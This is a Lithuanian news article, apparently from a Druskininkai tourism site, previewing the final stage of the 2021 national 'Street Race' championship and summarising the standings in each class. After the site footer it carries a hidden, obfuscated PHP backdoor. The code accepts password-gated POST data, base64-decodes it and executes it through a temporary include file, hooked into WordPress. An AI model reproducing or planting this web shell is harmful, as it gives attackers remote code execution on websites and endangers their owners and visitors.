fbpx
A A
A A

Druskininkuose paaiškės šių metų „Street Race“ Lietuvos čempionai

2021.09.22

Jau rugsėjo 25-ą dieną, šeštadienį Druskininkuose įvyks Lietuvos „Street Race“ čempionato atomazga – „RaceDay Druskininkai“. Tai bus paskutinis, šeštasis šių metų sezono etapas, po kurio paaiškės naujieji Lietuvos čempionai. Paskutinės sezono lenktynės bus išties intriguojančios, kadangi dalyviai čia galės susižerti daugiau taškų nei įprastai.

Vos paskelbus registraciją į varžybas etapo organizatoriai „Marimotors Racing“ sulaukė tikro ažiotažo. Per labai trumpą laiką buvo rezervuota šimtas starto numerių, tad „RaceDay Druskininkai“ etape bus išties daug veiksmo. Šeštadienį įvyksiančių varžybų trasai suformuoti bus panaudota Gardino gatvės atkarpa nuo sankryžos su Veisiejų gatve iki autobusų stoties.

Čia bus varžomasi ne tik dėl sezono taškų, bet ir dėl Druskininkų savivaldybės mero Ričardo Malinausko įsteigtos vardinės taurės. Ji bus įteikta vieno geriausio rezultato autoriui. Be to, jau antrus metus iš eilės „RaceDay Druskininkai“ varžybos tampa „Druskininkų turizmo dienų“ renginių ciklo dalimi, tad savivaldos pasitikėjimą pelnę organizatoriai stebėti lenktynes kviečia ir žiūrovus.

Daugiausiai intrigos įneš tai, kad paskutinis „Street Race“ sezono etapas taškų prasme yra vertingesnis už prieš tai buvusius. Jame taikomas 1,5 taškų koeficientas, todėl ši taisyklė gali lemti pokyčius galutinėse rezultatų lentelėse. Be to, čia kortas gali sumaišyti ir dar viena čempionato taisyklė – iš šešių sezono etapų bus anuliuotas vienas, kiekvienam dalyviui blogiausiai susiklostęs etapas ir sumuojami likusių geresnių pasirodymų metu uždirbti taškai.

Šiuo metu po jau įvykusių etapų SGC-1 klasėje užtikrintai lyderiauja visus etapus iki šiol laimėjęs Kristupas Šablinskas. Matematika čia paprasta – paskutiniame etape jam pakanka tik startuoti ir čempiono karūną jis užsidės antrus metus iš eilės. Viską, ko reikėjo pakeliui link čempiono vardo, Kristupas Šablinskas padarė per penkis iki šiol įvykusius etapus. Pakankamai užtikrintas dėl vicečempiono vardo gali būti ir Lukas Gordonas, visuose iki šiol etapuose finišavęs antroje vietoje. Tačiau kovoje dėl trečiosios vietos metinės taurės dar niekas neaišku. Šiuo metu čia klasifikuojamas Rytis Jankevičius, tačiau Vaidas Karašauskas nuo jo atsilieka penkiais taškais.

SGC-2 klasėje praktiškai nebepavejamas Edvinas Sabalys, kuris per penkis etapus iškovojo dvi pergales ir tris sykius buvo antras. Įdomu tai, kad šis sportininkas dviem skirtingais automobiliais lenktyniauja net dviejose klasėse. Visgi daugiausiai klausimų kyla dėl žemesnių pozicijų. Antroje vietoje su 38 taškais kol kas žengia Justas Eimontas, keturiais nuo jo atsilieka Donatas Jankauskas, o dar dviejų taškų deficitą nuo pastarojo turi Vykintas Šakalis. Taigi, N-1 taisyklė ir 1,5 koeficientas paskutiniam etapui čia teoriškai dar gali sumaišyti kortas.

SGC-3 įskaitos lentelės viršuje šiuo metu du dalyvius skiria vos vienas taškas. Dabar su 48 taškais lyderiu klasifikuojamas Paulius Skarbalius, kuris minimalia persvara atitrūkęs nuo Arnoldo Pukio. Dėl trečiosios vietos intrigos ne ką mažiau. Čia net du dalyviai – Edvinas Sabalys ir Aivaras Karsokas turi po 34 taškus. Tiesa, pretenzijų į trečiąją vietą dar turi ir Darius Sukackas, laimėjęs paskutinįjį etapą Varėnoje ir nuo trečiosios vietos dabar atsiliekantis vos dviem taškais.

SGC-4 įskaitoje tvyro tokia pati įtampa, nes čia su 49 taškais lyderiaujantis Justinas Kvaraciejus vos vienu tašku lenkia Sergej Finenko. Karolis Raišys su 38 taškais žengia trečias, o septyniais nuo jo atsilieka Pavel Viduto.

OC klasės lyderis po penkių etapų – Paulius Vasiliūnas. Jis iki šiol yra sukaupęs 46 taškus ir dėl savo pozicijos jau gali būti daugiau ar mažiau ramus. Antroje vietoje esantį Sergej Finenko ir trečioje vietoje klasifikuojamą Justiną Kvaraciejų teskiria keturi taškai – atitinkamai 34 ir 30 balų.

Tačiau šioje klasėje šįkart vėl startuos Algirdas Gelžinis. Jis iki šiol dalyvavo vos viename etape Veisiejuose ir ten iškovojo pergalę. Tąkart jis lenktyniavo „Audi TTRS“ automobiliu, tačiau šįkart grįžta su „Street Race“ trasose iki šiol nematytu elektromobiliu – „Tesla Model 3 Performance“. Ir nors Audrius Gelžinis dėl čempiono vardo metinėje įskaitoje tikrai nekovos, jis čia gali tapti svarbių, didesnės vertės taškų vagimi ir sugriauti kitų dalyvių planus. Verta paminėti, kad prieš dvejus metus Algirdas Gelžinis su „Audi TTRS“ jau buvo tapęs greičiausiu dalyviu Druskininkuose ir savo kolekcijoje turi Druskininkų savivaldybės mero Ričardo Malinausko taurę. Ką daryti norint triumfuoti šioje miesto gatvėje suformuotoje trasoje šis sportininkas tikrai žino.

Komandinės įskaitos rikiuotės viršūnėje – taip pat ankšta. Čia su 46 taškais šiuo metu rikiuojasi dvi ekipos – 2019 ir 2020 metų „Street Race“ komanda čempionė „Marimotors Racing“ bei „Slalomo akademija“ rinktinė. Vos dviem taškais žemiau – „Kauno autoklubo“ atstovai.

Taigi, paskutinysis etapas „RaceDay Druskininkai“ bus išties dramatiškas, po kurio paaiškės galutinės pozicijos šių metų Lietuvos „Street Race“ čempionate. Daugiau informacijos apie būsimas varžybas galite rasti organizatorių „Marimotors Racing“ puslapyje.

 

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}